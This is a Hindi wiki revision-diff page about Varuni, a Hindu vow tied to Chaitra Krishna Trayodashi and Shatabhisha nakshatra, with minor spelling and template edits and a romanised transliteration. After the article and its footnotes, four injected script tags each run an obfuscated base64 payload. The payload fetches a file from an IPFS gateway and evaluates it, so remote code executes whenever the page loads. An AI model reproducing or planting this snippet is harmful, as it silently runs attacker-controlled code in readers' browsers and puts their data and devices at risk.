Difference between revisions of "वारुणी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - ")</ref" to "</ref")
 
(7 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*[[चैत्र]] [[कृष्ण पक्ष]] की [[त्रियोदशी]] को, जब वह [[शताभिषज नक्षत्र]]<ref>(जिसके देवता [[वरुण देवता|वरुण]] हैं)</ref> में पड़े तो उसे वारुणी कहते हैं, जो कि एक करोड़ सूर्य ग्रहण के समान है।
+
*[[चैत्र]] [[कृष्ण पक्ष]] की [[त्रयोदशी]] को, जब वह [[शतभिषा नक्षत्र|शतभिषा]] [[नक्षत्र]]<ref>जिसके [[देवता]] [[वरुण देवता|वरुण]] हैं</ref> में पड़े तो उसे वारुणी कहते हैं, जो कि एक करोड़ सूर्य ग्रहण के समान है।
 
*यदि यह इसके साथ [[शनिवार]] को पड़े तो महावारुणी कही जाती है।
 
*यदि यह इसके साथ [[शनिवार]] को पड़े तो महावारुणी कही जाती है।
*इन सब बातों के साथ यदि शुभ योग पड़े तो इसे महा-महा-वारुणी कहा जाता है। <ref>वर्षक्रियाकौमुदी (518-519); कृत्यतत्व (463); स्मृतिकौस्तुभ (107); गदाधरपद्धति (611, [[स्कन्दपुराण]] से उर्द्धरत); कालतत्त्वविवेचन (189-190)</ref>
+
*इन सब बातों के साथ यदि शुभ योग पड़े तो इसे महा-महा-वारुणी कहा जाता है। <ref>वर्षक्रियाकौमुदी (518-519); कृत्यतत्त्व (463); स्मृतिकौस्तुभ (107); गदाधरपद्धति (611, [[स्कन्दपुराण]] से उर्द्धरत); कालतत्त्वविवेचन (189-190</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 13:00, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr krishna paksh ki trayodashi ko, jab vah shatabhisha nakshatr[1] mean p de to use varuni kahate haian, jo ki ek karo d soory grahan ke saman hai.
  • yadi yah isake sath shanivar ko p de to mahavaruni kahi jati hai.
  • in sab batoan ke sath yadi shubh yog p de to ise maha-maha-varuni kaha jata hai. [2]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. jisake devata varun haian
  2. varshakriyakaumudi (518-519); krityatattv (463); smritikaustubh (107); gadadharapaddhati (611, skandapuran se urddharat); kalatattvavivechan (189-190

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>